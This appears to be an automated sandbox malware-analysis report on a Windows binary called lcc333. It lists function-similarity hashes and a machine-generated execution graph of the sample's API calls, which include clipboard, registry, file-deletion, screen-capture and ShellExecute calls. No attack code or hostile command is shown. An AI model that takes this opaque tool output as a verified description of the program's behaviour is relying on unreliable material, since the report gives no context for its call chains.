                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                          • String ID: :
                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                          • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                          • Instruction ID: 1d1db6d086b522bb19c40cb2ac4967d1b35b6f29d7f498b7fe5ad62a7c2df2c8
                                                                                                                                                          • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                          • Instruction Fuzzy Hash: A0210672A18B8281EB20EF16D89426DB3B1FB89B94FD54036D64D43684EF7CE5488B60
                                                                                                                                                          Function 00007FF714C8FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                          • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                          • Instruction ID: 5c0b9ad04a8988dc1978da8b1bafdf30e51e9c425254117db3a19c375d25a648
                                                                                                                                                          • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                          • Instruction Fuzzy Hash: E3115E32618F8682EB219F16E440269B7E4FB89B98F984632EB8D07754EF3CC555C700
                                                                                                                                                          Function 00007FF714CA073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                          • String ID: :
                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                          • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                          • Instruction ID: 0939bb49694a9fde338943d3a18945382841ac9d58c0c1bb794352cce71fa38e
                                                                                                                                                          • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                          • Instruction Fuzzy Hash: E701886291CA0385F720BF62D4A527EE3A0EF46BA4FD00437D54D86685FE3CD5088B24

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:0.1%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:17%
                                                                                                                                                          Total number of Nodes:1934
                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                          execution_graph 3830 140007de4 3856 140011d84 GetCurrentProcess LoadLibraryA 3830->3856 3835 140007e57 3839 140001438 4 API calls 3835->3839 3836 140007e40 3837 140007e4a FreeLibrary 3836->3837 3838 140007e50 3836->3838 3837->3838 3840 140007e76 3839->3840 3841 140007e9b 3840->3841 3842 14000802c memset CreateProcessA 3840->3842 3874 1400013e4 3841->3874 3843 1400080b3 3842->3843 3844 1400080ab GetLastError 3842->3844 3843->3838 3846 1400080bd FreeLibrary 3843->3846 3844->3843 3846->3838 3848 140008008 GetLastError 3851 140008010 3848->3851 3849 140007f42 memset 3877 140001368 3849->3877 3850 140007f15 LoadLibraryA GetProcAddress 3850->3849 3851->3843 3852 140008021 FreeLibrary 3851->3852 3852->3843 3857 140011ead GetLastError 3856->3857 3858 140011dbf GetProcAddress 3856->3858 3859 140007e1d 3857->3859 3860 140011de3 FreeLibrary 3858->3860 3862 140011dd4 3858->3862 3871 140001438 3859->3871 3860->3857 3861 140011df4 LoadLibraryA 3860->3861 3863 140011e33 LoadLibraryA 3861->3863 3864 140011e09 GetProcAddress 3861->3864 3862->3860 3865 140011e96 GetLastError CloseHandle 3863->3865 3866 140011e5d GetProcAddress 3863->3866 3867 140011e2a FreeLibrary 3864->3867 3868 140011e1e 3864->3868 3865->3859 3869 140011e72 3866->3869 3870 140011e8d FreeLibrary 3866->3870 3867->3863 3868->3867 3869->3870 3870->3865 3872 140001447 LoadLibraryA GetProcAddress GetModuleHandleA GetProcAddress 3871->3872 3873 14000148c 3871->3873 3872->3873 3873->3835 3873->3836 3875 140001368 5 API calls 3874->3875 3876 1400013f9 3875->3876 3876->3848 3876->3849 3876->3850 3878 140001378 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3877->3878 3879 1400013db 3877->3879 3878->3879 3879->3848 3879->3851 3880 140007ce4 3885 140012788 strchr 3880->3885 3883 140007d14 memcpy 3884 140007d29 3883->3884 3886 1400127ca strchr 3885->3886 3887 1400127ad _stricmp 3885->3887 3886->3887 3889 1400127f9 memset 3886->3889 3891 140007d10 3887->3891 3892 140012815 strcpy strchr 3889->3892 3891->3883 3891->3884 3892->3887 3893 1400026e4 3900 140002060 3893->3900 3896 1400027bc 3897 14000272c GetObjectA GetDC CreateDIBitmap ReleaseDC OpenClipboard 3898 140002794 EmptyClipboard SetClipboardData CloseClipboard 3897->3898 3899 1400027ae DeleteObject 3897->3899 3898->3899 3899->3896 3901 140002074 3900->3901 3902 14000207c LoadLibraryA 3900->3902 3901->3896 3901->3897 3902->3901 3903 140002095 10 API calls 3902->3903 3903->3901 3904 140013968 3905 140013995 3904->3905 3906 1400139a1 3905->3906 3907 140013a65 GetLastError 3905->3907 3909 140013a52 GetLastError 3906->3909 3910 1400139bd 3906->3910 3908 140013a47 3907->3908 3909->3908 3912 1400139ee GetLastError 3910->3912 3913 1400139d5 3910->3913 3915 1400139f8 3910->3915 3911 140013a3f GetLastError 3911->3908 3912->3913 3913->3908 3913->3911 3914 1400139fa Sleep 3914->3915 3915->3913 3915->3914 3916 14000b069 3917 14000b06d 3916->3917 3931 140006ea0 3917->3931 3919 14000b2d9 3920 14000b17d _stricmp 3921 14000b1a1 _stricmp 3920->3921 3930 14000b10a 3920->3930 3922 14000b1b8 _stricmp 3921->3922 3923 14000b1fe _stricmp 3922->3923 3922->3930 3924 14000b22c _stricmp 3923->3924 3923->3930 3925 14000b250 _stricmp 3924->3925 3924->3930 3927 14000b274 _stricmp 3925->3927 3925->3930 3927->3930 3929 14000b29b MessageBoxA 3929->3919 3929->3930 3930->3919 3930->3920 3930->3921 3930->3923 3930->3924 3930->3925 3930->3927 3930->3929 3936 140002df4 3930->3936 3932 140006eb5 3931->3932 3933 140006ef7 3932->3933 3941 1400066a8 3932->3941 3933->3930 3937 140002e14 atoi 3936->3937 3938 140002dfd 3936->3938 3940 140002e19 Sleep 3937->3940 3938->3937 3939 140002e03 strtoul 3938->3939 3939->3940 3940->3923 3942 140006e77 strcpy 3941->3942 3950 1400066e2 3941->3950 3942->3932 3942->3933 3943 14000672c strtoul 3943->3950 3944 1400067f3 memcpy _strnicmp 3945 140006833 memset 3944->3945 3946 1400068ab _strnicmp 3944->3946 3980 140007950 3945->3980 3948 1400068ca memset 3946->3948 3949 14000693e _strnicmp 3946->3949 3948->3950 3951 140006961 memset GetDateFormatA strlen 3949->3951 3952 1400069e3 _strnicmp 3949->3952 3950->3942 3950->3943 3950->3944 3953 140006904 strlen 3950->3953 3956 140006871 strlen 3950->3956 3961 140006da8 memcpy 3950->3961 3966 140006b63 GetModuleFileNameA strlen 3950->3966 3968 140006e4b CloseClipboard 3950->3968 3970 140006d7e strlen 3950->3970 3973 140006e3d GlobalUnlock 3950->3973 3974 140006e2a memcpy 3950->3974 3976 1400038d0 free 3950->3976 3977 140003794 5 API calls 3950->3977 3979 140006cdc memcpy 3950->3979 3992 140003860 3950->3992 3996 1400038f8 3950->3996 4002 140001640 DialogBoxParamA 3950->4002 4003 140003794 strlen 3950->4003 3951->3950 3954 140006a06 memset GetTimeFormatA strlen 3952->3954 3955 140006a88 _strnicmp 3952->3955 3953->3950 3954->3950 3957 140006b06 _strnicmp 3955->3957 3958 140006aa7 memset GetEnvironmentVariableA 3955->3958 3956->3950 3959 140006b29 memset 3957->3959 3960 140006bad _strnicmp 3957->3960 3958->3950 3959->3950 3960->3950 3962 140006d12 _strnicmp 3960->3962 3961->3950 3962->3950 3963 140006db8 _strnicmp 3962->3963 3963->3950 3965 140006ddb OpenClipboard 3963->3965 3965->3950 3967 140006de8 GetClipboardData 3965->3967 3966->3950 3967->3968 3969 140006dfb GlobalLock 3967->3969 3968->3950 3969->3950 3970->3950 3973->3950 3974->3973 3976->3950 3978 140006cc2 strlen 3977->3978 3978->3950 3979->3950 4008 140007a34 _stricmp 3980->4008 3983 140007988 _stricmp 3986 14000799b GetSystemDirectoryA 3983->3986 3987 1400079b0 _stricmp 3983->3987 3984 140007970 4026 140013bc0 3984->4026 3991 14000797c 3986->3991 3988 1400079d3 _stricmp 3987->3988 3989 1400079c3 GetWindowsDirectoryA 3987->3989 3990 1400079e6 GetModuleFileNameA strlen 3988->3990 3988->3991 3989->3991 3990->3991 3991->3950 3993 140003885 3992->3993 3995 1400038b3 3992->3995 3994 14000389e strcmp 3993->3994 3993->3995 3994->3993 3994->3995 3995->3950 3997 14000394c 3996->3997 3998 1400038fd strlen 3996->3998 3997->3950 4050 140002a2c 3998->4050 4001 14000393e memcpy 4001->3997 4002->3950 4004 140002a2c 3 API calls 4003->4004 4005 1400037ea 4004->4005 4006 140002a2c 3 API calls 4005->4006 4007 140003809 memcpy 4006->4007 4007->3950 4009 14000796a 4008->4009 4010 140007a60 _stricmp 4008->4010 4009->3983 4009->3984 4010->4009 4011 140007a7d _stricmp 4010->4011 4011->4009 4012 140007a9a _stricmp 4011->4012 4012->4009 4013 140007ab7 _stricmp 4012->4013 4013->4009 4014 140007ad4 _stricmp 4013->4014 4014->4009 4015 140007af1 _stricmp 4014->4015 4015->4009 4016 140007b0e _stricmp 4015->4016 4016->4009 4017 140007b2b _stricmp 4016->4017 4017->4009 4018 140007b48 _stricmp 4017->4018 4018->4009 4019 140007b65 _stricmp 4018->4019 4019->4009 4020 140007b82 _stricmp 4019->4020 4020->4009 4021 140007b9f _stricmp 4020->4021 4021->4009 4022 140007bb9 _stricmp 4021->4022 4022->4009 4023 140007bd3 _stricmp 4022->4023 4023->4009 4024 140007bed _stricmp 4023->4024 4024->4009 4025 140007c07 _stricmp 4024->4025 4025->4009 4039 140013a84 4026->4039 4029 140013c17 memset 4030 140013c33 RegOpenKeyExA 4029->4030 4033 140013cc3 strcpy 4030->4033 4034 140013c6f 4030->4034 4037 140013c01 4033->4037 4046 140013ae4 4034->4046 4037->3991 4040 140013a92 LoadLibraryA 4039->4040 4041 140013add 4039->4041 4040->4041 4042 140013aab GetProcAddress GetProcAddress 4040->4042 4041->4029 4043 140002bb0 4041->4043 4042->4041 4044 140002bd4 4043->4044 4045 140002bbd GetVersionExA 4043->4045 4044->4029 4044->4037 4045->4044 4049 140013af0 4046->4049 4047 140013bab strcpy 4048 140013b73 RegQueryValueExA RegCloseKey 4047->4048 4048->4033 4049->4047 4049->4048 4051 140002a50 free 4050->4051 4053 140002a5f 4050->4053 4052 140002aab 4051->4052 4052->3997 4052->4001 4053->4052 4054 140002a91 memcpy 4053->4054 4055 140002aa3 free 4053->4055 4054->4055 4055->4052 4056 14001286c 4057 140012788 6 API calls 4056->4057 4058 140012881 4057->4058 4059 140012885 memcpy 4058->4059 4060 1400128a8 4058->4060 4059->4060 4061 140005f74 waveOutGetVolume 4062 140005fa6 waveOutSetVolume 4061->4062 4063 140005fe8 4061->4063 4062->4063 4064 140015c78 4065 140015d1b __set_app_type 4064->4065 4066 140015d5f 4065->4066 4067 140015d75 _initterm __getmainargs _initterm 4066->4067 4068 140015e16 4067->4068 4069 140001d78 4074 1400014e4 4069->4074 4072 140001dae 4073 1400014e4 9 API calls 4073->4072 4075 140001522 GetDlgItem GetWindowTextLengthA 4074->4075 4076 140001509 SetDlgItemTextA 4074->4076 4078 140001577 4075->4078 4079 14000153a 4075->4079 4077 14000158a 4076->4077 4077->4072 4077->4073 4080 1400038f8 5 API calls 4078->4080 4081 140002a2c 3 API calls 4079->4081 4080->4077 4082 140001556 GetDlgItemTextA 4081->4082 4082->4077 4083 14000c0fa 4365 14000702c _stricmp 4083->4365 4085 14000c105 4086 14000c11a 4085->4086 4087 1400103d6 CoInitialize 4085->4087 4366 14000702c _stricmp 4086->4366 4403 140013fc0 4087->4403 4090 14000c12c 4092 14000c141 4090->4092 4094 1400104fd CoInitialize memset MultiByteToWideChar 4090->4094 4367 14000702c _stricmp 4092->4367 4097 140010561 4094->4097 4101 14001057e 4097->4101 4102 14001056d atoi 4097->4102 4098 14000c153 4100 1400119f5 4098->4100 4368 14000702c _stricmp 4098->4368 4099 140013fc0 18 API calls 4105 14001048f 4099->4105 4567 14000aa94 CoInitialize 4100->4567 4422 1400148f0 4101->4422 4102->4101 4413 140014b48 4105->4413 4106 14000c16d 4110 14000c182 4106->4110 4113 1400105bb 4106->4113 4108 1400119fa 4108->4108 4369 14000702c _stricmp 4110->4369 4444 14000702c _stricmp 4113->4444 4116 14000eb44 CoUninitialize 4122 14000b2d9 4116->4122 4117 1400104b3 atof 4418 1400159dc 4117->4418 4118 14000c194 4123 14000c1fb 4118->4123 4370 14000702c _stricmp 4118->4370 4377 14000702c _stricmp 4123->4377 4125 1400105cf 4126 140010622 4125->4126 4445 1400028bc CreateFileA 4125->4445 4446 140003ae8 4126->4446 4128 14000c20d 4133 14000c215 4128->4133 4134 1400119dd SHChangeNotify 4128->4134 4378 14000702c _stricmp 4133->4378 4134->4100 4135 14000c1d9 4138 14000c1e9 4135->4138 4139 140010714 4135->4139 4371 140001dec 4138->4371 4472 140001f5c 4139->4472 4140 14000c227 4144 14000c23c 4140->4144 4147 140010762 4140->4147 4143 1400106f4 4148 140010707 4143->4148 4149 1400106fe CloseHandle 4143->4149 4379 14000702c _stricmp 4144->4379 4482 140002170 4147->4482 4469 140003ac4 4148->4469 4149->4148 4152 140010743 4153 140001dec FreeLibrary 4152->4153 4159 140010750 4153->4159 4154 140010665 memset 4462 1400063d0 LoadLibraryExA 4154->4462 4156 14000c24e 4163 14000c263 4156->4163 4166 140010911 4156->4166 4164 140001e14 FreeLibrary 4159->4164 4160 140003b64 8 API calls 4179 14001064e 4160->4179 4380 14000702c _stricmp 4163->4380 4164->4122 4165 14000e9ca 4400 140002008 4165->4400 4168 140002170 11 API calls 4166->4168 4172 14001096f 4168->4172 4169 140003ae8 5 API calls 4174 140010808 4169->4174 4170 14000c275 4175 140011885 RegOpenKeyExA 4170->4175 4176 14000c27d 4170->4176 4172->4165 4181 140002614 29 API calls 4172->4181 4173 1400106b5 sprintf 4173->4179 4178 140003b64 8 API calls 4174->4178 4175->4122 4177 1400118e6 memset memset 4175->4177 4381 14000702c _stricmp 4176->4381 4564 140013100 RegQueryValueExA 4177->4564 4200 140010815 4178->4200 4179->4143 4179->4154 4179->4160 4179->4173 4468 1400028ec strlen WriteFile 4179->4468 4205 14000cf67 4181->4205 4183 14000c28f 4187 140011852 SendMessageTimeoutA 4183->4187 4382 14000702c _stricmp 4183->4382 4185 140011943 atoi 4190 140011958 _itoa 4185->4190 4185->4205 4186 1400108f3 4191 1400021bc 11 API calls 4186->4191 4187->4122 4565 14001312c strlen RegSetValueExA 4190->4565 4195 1400108ff 4191->4195 4192 14000c2a9 4192->4187 4383 14000702c _stricmp 4192->4383 4199 140003ac4 FindClose 4195->4199 4196 140010834 memset strcpy strrchr 4196->4200 4197 140003b64 8 API calls 4197->4200 4198 140011993 SendMessageTimeoutA 4566 14001312c strlen RegSetValueExA 4198->4566 4199->4165 4200->4186 4200->4196 4200->4197 4203 140002fcc strlen strlen strcat 4200->4203 4485 140002614 memset MultiByteToWideChar 4200->4485 4203->4200 4204 14000c2c3 4206 1400117b3 4204->4206 4384 14000702c _stricmp 4204->4384 4397 1400021bc 4205->4397 4209 1400117c8 memset strcpy 4206->4209 4212 140011811 SendMessageTimeoutA 4206->4212 4209->4212 4211 14000c2dd 4213 140011772 4211->4213 4214 14000c2e5 4211->4214 4212->4187 4215 140002bb0 GetVersionExA 4213->4215 4385 14000702c _stricmp 4214->4385 4217 14001177b 4215->4217 4219 1400117a6 MessageBeep 4217->4219 4221 140002df4 2 API calls 4217->4221 4218 14000c2f7 4220 14000c30c 4218->4220 4222 1400109ac 4218->4222 4219->4206 4386 14000702c _stricmp 4220->4386 4225 14001179f 4221->4225 4492 1400031d8 4222->4492 4225->4219 4226 14000c31e 4227 1400109c0 4226->4227 4228 14000c333 4226->4228 4500 140008fe4 4227->4500 4387 14000702c _stricmp 4228->4387 4230 14000c345 4232 14000c35a 4230->4232 4233 1400109d8 CoInitialize CoCreateInstance 4230->4233 4388 14000702c _stricmp 4232->4388 4233->4116 4236 140010a1d memset MultiByteToWideChar 4233->4236 4235 14000c36c 4237 14000c381 4235->4237 4239 140010ce0 4235->4239 4503 14000702c _stricmp 4236->4503 4389 14000702c _stricmp 4237->4389 4243 140008fe4 16 API calls 4239->4243 4241 140010a8b 4242 140010a93 4241->4242 4504 14000702c _stricmp 4241->4504 4248 140010b00 4242->4248 4251 140010add atoi 4242->4251 4246 140010cf3 4243->4246 4244 14000c393 4247 14000c3a8 4244->4247 4249 140010cf8 memset 4244->4249 4246->4249 4390 14000702c _stricmp 4247->4390 4253 140010b41 4248->4253 4255 140010b1d atoi 4248->4255 4252 140010da2 SHFileOperationA 4249->4252 4304 140010d21 4249->4304 4251->4248 4252->4122 4260 140010b68 memset MultiByteToWideChar CoCreateInstance 4253->4260 4271 1400104d9 4253->4271 4254 14000c3ba 4256 14000c3d0 4254->4256 4391 14000702c _stricmp 4254->4391 4255->4253 4258 14000c3e5 4256->4258 4259 1400114d5 4256->4259 4392 14000702c _stricmp 4258->4392 4262 140002170 11 API calls 4259->4262 4263 140010be9 4260->4263 4260->4271 4266 140011533 4262->4266 4264 140010c20 4263->4264 4505 140004a18 4263->4505 4509 14000507c 4264->4509 4265 14000c3f7 4268 14000c40c 4265->4268 4273 140010de7 4265->4273 4266->4165 4269 14001153b GetDC GetDeviceCaps GetDeviceCaps 4266->4269 4393 14000702c _stricmp 4268->4393 4563 14000702c _stricmp 4269->4563 4271->4116 4278 140002170 11 API calls 4273->4278 4276 14001158e 4279 140011592 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 4276->4279 4280 1400115d8 4276->4280 4277 14000c41e 4281 14000c433 4277->4281 4285 140010fde 4277->4285 4282 140010e45 4278->4282 4279->4280 4283 1400115e6 atoi atoi atoi atoi 4280->4283 4284 14001164b CreateCompatibleBitmap CreateCompatibleDC SelectObject BitBlt _stricmp 4280->4284 4394 14000702c _stricmp 4281->4394 4282->4165 4287 140010e4d 8 API calls 4282->4287 4283->4284 4292 140011722 4284->4292 4293 1400116de OpenClipboard 4284->4293 4290 140003ae8 5 API calls 4285->4290 4288 140010f91 4287->4288 4289 140010f4d OpenClipboard 4287->4289 4530 140002594 4288->4530 4289->4205 4296 140010f5d EmptyClipboard SetClipboardData CloseClipboard SelectObject DeleteDC 4289->4296 4299 140011057 4290->4299 4295 140002594 27 API calls 4292->4295 4293->4205 4300 1400116ee EmptyClipboard SetClipboardData CloseClipboard SelectObject DeleteDC 4293->4300 4294 14000c445 4294->4122 4395 14000702c _stricmp 4294->4395 4301 14001173f SelectObject DeleteDC DeleteObject 4295->4301 4302 140010fd1 ReleaseDC 4296->4302 4298 14000702c _stricmp 4298->4304 4305 140003b64 8 API calls 4299->4305 4300->4302 4301->4302 4304->4298 4310 140010d9c 4304->4310 4308 140011064 4305->4308 4316 140003794 5 API calls 4308->4316 4317 140003b64 8 API calls 4308->4317 4340 140011098 4308->4340 4309 14000c470 4311 14000c485 4309->4311 4313 14001128e 4309->4313 4310->4252 4396 14000702c _stricmp 4311->4396 4312 140011272 4544 140003758 free free 4312->4544 4545 1400065c0 4313->4545 4316->4308 4317->4308 4318 14000c497 4321 140011446 memset 4318->4321 4322 14000b19a 4318->4322 4319 14001127c 4323 140003ac4 FindClose 4319->4323 4326 140011478 sprintf 4321->4326 4327 140011490 strcpy 4321->4327 4322->4122 4331 14000b17d _stricmp 4322->4331 4333 14000b1a1 _stricmp 4322->4333 4341 14000b1fe _stricmp 4322->4341 4344 14000b22c _stricmp 4322->4344 4348 14000b250 _stricmp 4322->4348 4349 140002df4 2 API calls 4322->4349 4351 14000b274 _stricmp 4322->4351 4356 14000b29b MessageBoxA 4322->4356 4323->4122 4324 1400110e9 GetFileAttributesA 4328 140011113 CreateFileA 4324->4328 4329 140011105 SetFileAttributesA 4324->4329 4332 14001149c _strlwr ShellExecuteA 4326->4332 4327->4332 4334 140011146 GetFileSize memset 4328->4334 4328->4340 4329->4328 4331->4322 4331->4333 4332->4122 4336 14000b1b8 _stricmp 4333->4336 4337 14001120f CloseHandle DeleteFileA 4334->4337 4334->4340 4335 1400112dc strrchr 4338 140011303 ExtractIconExA 4335->4338 4339 1400112f5 atoi 4335->4339 4336->4322 4336->4341 4337->4340 4551 140013cf0 4338->4551 4339->4338 4340->4312 4340->4324 4340->4337 4342 1400111a3 SetFilePointer WriteFile 4340->4342 4537 140006f98 4340->4537 4341->4322 4341->4344 4342->4340 4342->4342 4344->4322 4344->4348 4347 140002df4 2 API calls 4350 14001137b 4347->4350 4348->4322 4348->4351 4352 14000b1eb Sleep 4349->4352 4555 140013e20 4350->4555 4351->4322 4352->4341 4354 1400113b9 SetTimer 4355 1400113ec GetMessageA 4354->4355 4357 140011406 KillTimer 4355->4357 4358 1400113d0 TranslateMessage DispatchMessageA 4355->4358 4356->4122 4356->4322 4560 140013d60 4357->4560 4358->4355 4361 140011432 4363 140013d60 Shell_NotifyIconA 4361->4363 4362 14001142c DestroyIcon 4362->4361 4364 140011441 4363->4364 4364->4321 4365->4085 4366->4090 4367->4098 4368->4106 4369->4118 4370->4135 4372 140001e03 4371->4372 4373 140001dfd FreeLibrary 4371->4373 4374 140001e14 4372->4374 4373->4372 4375 140001e26 FreeLibrary 4374->4375 4376 140001e2c 4374->4376 4375->4376 4376->4123 4377->4128 4378->4140 4379->4156 4380->4170 4381->4183 4382->4192 4383->4204 4384->4211 4385->4218 4386->4226 4387->4230 4388->4235 4389->4244 4390->4254 4391->4256 4392->4265 4393->4277 4394->4294 4395->4309 4396->4318 4398 140002060 11 API calls 4397->4398 4399 1400021ca 4398->4399 4399->4165 4401 140002028 4400->4401 4402 14000201f FreeLibrary 4400->4402 4401->4122 4402->4401 4404 1400103e3 4403->4404 4405 140013fcd 4403->4405 4407 1400146d0 4404->4407 4406 1400148f0 18 API calls 4405->4406 4406->4404 4408 1400146f2 CoCreateInstance 4407->4408 4409 1400146ed free 4407->4409 4410 1400103eb memset memset MultiByteToWideChar MultiByteToWideChar 4408->4410 4411 140014747 4408->4411 4409->4408 4410->4099 4411->4410 4578 140014444 memset 4411->4578 4414 140014b74 4413->4414 4415 1400104a7 4413->4415 4414->4415 4416 140014b95 _wcsicmp 4414->4416 4415->4116 4415->4117 4416->4414 4417 140014ba5 _wcsicmp 4416->4417 4417->4414 4417->4415 4419 1400159f2 4418->4419 4420 140015a1b 4418->4420 4419->4420 4421 1400159fc CoCreateInstance 4419->4421 4420->4271 4421->4420 4423 140014911 free 4422->4423 4424 140014916 CoCreateInstance 4422->4424 4423->4424 4425 140014956 4424->4425 4431 14001058b 4424->4431 4602 1400140b8 4425->4602 4430 1400142cc 2 API calls 4430->4431 4432 1400149a0 4431->4432 4631 140014be8 4432->4631 4435 1400149c4 CoCreateInstance 4436 1400105a3 CoUninitialize 4435->4436 4437 140013f3c 4436->4437 4438 140013f51 free 4437->4438 4439 140013f56 4437->4439 4438->4439 4440 140013f78 free 4439->4440 4441 140013f7d 4439->4441 4440->4441 4442 140013fa4 4441->4442 4443 140013f9f free 4441->4443 4442->4122 4443->4442 4444->4125 4445->4126 4447 140003b03 FindClose 4446->4447 4448 140003b10 4446->4448 4447->4448 4449 1400029dc 2 API calls 4448->4449 4450 140003b22 strcpy strrchr 4449->4450 4451 140003b48 4450->4451 4452 140003b64 4451->4452 4453 140003ba8 FindNextFileA 4452->4453 4454 140003b90 FindFirstFileA 4452->4454 4456 140003bb7 4453->4456 4457 140003bcc strlen strlen 4453->4457 4455 140003bc8 4454->4455 4455->4457 4459 140003c10 4455->4459 4456->4455 4458 140003bbc FindClose 4456->4458 4457->4459 4460 140003c02 4457->4460 4458->4455 4459->4179 4635 140002c40 strcpy 4460->4635 4463 14000642d 4462->4463 4464 1400063f7 GetProcAddress 4462->4464 4463->4179 4466 140006417 FreeLibrary 4464->4466 4466->4463 4468->4179 4470 140003ad3 FindClose 4469->4470 4471 140003ae0 4469->4471 4470->4471 4471->4139 4640 140001e7c 4472->4640 4475 140001f88 memset MultiByteToWideChar 4477 140001fd6 4475->4477 4476 140001fec 4476->4152 4479 140006f64 4476->4479 4651 140001e3c 4477->4651 4480 140006f92 4479->4480 4481 140006f78 MessageBoxA 4479->4481 4480->4152 4481->4480 4483 140002060 11 API calls 4482->4483 4484 14000217e 4483->4484 4484->4165 4484->4169 4486 140002060 11 API calls 4485->4486 4488 140002678 4486->4488 4487 1400026cc 4487->4200 4488->4487 4656 140002510 memset MultiByteToWideChar 4488->4656 4493 1400031fc 4492->4493 4494 140003260 atoi 4492->4494 4493->4494 4495 140003203 4493->4495 4499 140003238 4494->4499 4496 140003208 memset 4495->4496 4497 14000324a strtoul 4495->4497 4498 1400029dc 2 API calls 4496->4498 4497->4499 4498->4499 4499->4227 4689 14001212c 4500->4689 4503->4241 4504->4242 4506 140005043 _stricmp 4505->4506 4507 140005053 4506->4507 4508 140005061 4506->4508 4507->4506 4507->4508 4508->4264 4510 1400050ac 4509->4510 4527 1400050e1 CoTaskMemFree 4509->4527 4511 1400050c8 CoTaskMemAlloc 4510->4511 4512 14000516b 4510->4512 4510->4527 4511->4527 4513 1400051d0 4512->4513 4514 140005170 CoTaskMemAlloc 4512->4514 4516 14000523d 4513->4516 4517 1400051dc CoTaskMemAlloc 4513->4517 4515 14000518d memset 4514->4515 4514->4527 4515->4527 4518 1400052f6 4516->4518 4519 14000527e CoTaskMemAlloc 4516->4519 4520 1400051fb memset 4517->4520 4517->4527 4522 140005302 CoTaskMemAlloc 4518->4522 4523 1400053ec 4518->4523 4521 14000529d memset 4519->4521 4519->4527 4520->4516 4521->4516 4525 140005321 memset 4522->4525 4522->4527 4524 1400053f8 CoTaskMemAlloc 4523->4524 4523->4527 4526 140005413 memset 4524->4526 4524->4527 4528 140005364 memcpy 4525->4528 4526->4527 4527->4271 4528->4523 4531 140002060 11 API calls 4530->4531 4532 1400025b7 4531->4532 4533 140002602 SelectObject DeleteDC DeleteObject 4532->4533 4534 140002510 27 API calls 4532->4534 4533->4302 4535 1400025f3 4534->4535 4536 1400022cc 11 API calls 4535->4536 4536->4533 4538 140006fc2 4537->4538 4539 140006fba GetLastError 4537->4539 4717 1400027d0 4538->4717 4539->4538 4542 140007017 